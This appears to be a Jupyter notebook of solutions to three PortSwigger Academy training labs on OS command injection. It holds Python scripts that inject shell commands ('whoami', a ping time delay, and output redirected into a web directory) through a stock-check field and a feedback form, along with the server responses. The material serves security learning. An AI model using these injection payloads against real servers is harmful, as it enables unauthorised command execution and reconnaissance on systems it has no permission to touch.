# OS Command Injection - Simple Case
[Lab](https://portswigger.net/web-security/os-command-injection/lab-simple)

In [1]:
import requests

In [6]:
URL = "https://acb41f391e91dd32c04f4079001300c0.web-security-academy.net/"

command_to_inject = " & whoami & "
data = {"productId" : "1", "storeId" : command_to_inject}

r = requests.post(URL + "product/stock/", data=data)

In [7]:
r.text

'peter-XNUspM\n'

# OS Command Injection - Blind (Time Delays)
[Lab](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)

Note - this should work but I solved it within the browser so I'm not positive

In [56]:
import requests
import re

URL = "https://ace41f931e599d87c03a144800e4005e.web-security-academy.net/"

#Create session
s = requests.session()
r = s.get(URL + "feedback")

#Grab csrf token
csrf = re.findall(r'csrf.*?="(.*?)">', r.text)[0]

#Specify attack
att = 'test%22+%26+ping+-c+10+127.0.0.1+%26+%22test'

data = {
    "csrf" : csrf,
    "name" : att,
    "email" : "test%40gmail.com",
    "subject" : "test",
    "message" : "test"}

r = s.post(URL + "feedback/submit", data=data)

In [57]:
r.text

'{}'

In [58]:
r.elapsed

datetime.timedelta(seconds=1, microseconds=627676)

The exact raw request that worked in the browser:
```
csrf=tkZR6IQHjA9oPzLLdcM4FJW6k8Qltujq&name=test%22+%26+ping+-c+10+127.0.0.1+%26+%22test&email=test%40blahmail.com&subject=test&message=test
```

# OS Command Injection - Blind (Redirect)

[Lab](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)

In [89]:
import requests
import re

URL = "https://ac811f5d1f1cf22cc0477529006d0009.web-security-academy.net/"

s = requests.session()
r = s.get(URL + "feedback")

#Get csrf
csrf = re.findall(r"csrf.*=\"(.*?)\">", r.text)[0]

attack = "test\" & \"whoami > /var/www/images/whoami.txt\" & \"test"

data = {
    "csrf" : csrf,
    "name" : "test",
    "email" : "test@blahmail.com",
    "subject" : "test",
    "message" : "test"
}

data['subject'] = attack
r = s.post(URL + "feedback/submit/", data=data)

In [90]:
r.text

'{}'

In [95]:
r = s.get(URL + "image?filename=whoami.txt")

In [96]:
r.text

'peter-8rqu20'

Yay!